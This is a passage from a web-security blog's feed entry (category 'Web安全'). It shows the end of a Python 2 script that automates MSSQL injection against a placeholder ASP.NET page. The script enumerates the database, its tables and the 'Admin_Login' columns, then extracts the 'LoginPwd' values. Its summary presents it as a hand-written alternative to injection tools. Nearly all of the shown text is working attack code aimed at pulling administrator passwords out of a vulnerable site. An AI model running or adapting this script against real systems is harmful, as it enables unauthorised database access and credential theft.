order by id)order by id"</span><br><span class="line">        try:</span><br><span class="line">            content = getcontent(payload)</span><br><span class="line">            data = getdata(content)</span><br><span class="line">            if data not in tablelist3:</span><br><span class="line">                tablelist3.append(data)</span><br><span class="line">            else:</span><br><span class="line">                break</span><br><span class="line">        except:</span><br><span class="line">            continue</span><br><span class="line">    print column</span><br><span class="line">    print tablelist3</span><br><span class="line"></span><br><span class="line">if __name__ == "__main__":</span><br><span class="line">    url="http://www.example/pages/BulletinPage.aspx?id=21"</span><br><span class="line">    db=getcurrentdb()</span><br><span class="line">    gettablename(db,200)</span><br><span class="line">    getcolumns(db,'Admin_Login',50)</span><br><span class="line">    getvalue(db,'Admin_Login','LoginPwd',50) #comment these out as you like, keeping only the function whose values you need</span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<p>When doing MSSQL injection, for all sorts of reasons we sometimes cannot use a tool to retrieve values, so we can write our own script to do it. Python is widely used for this because of how well it fetches web pages.
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
</feed>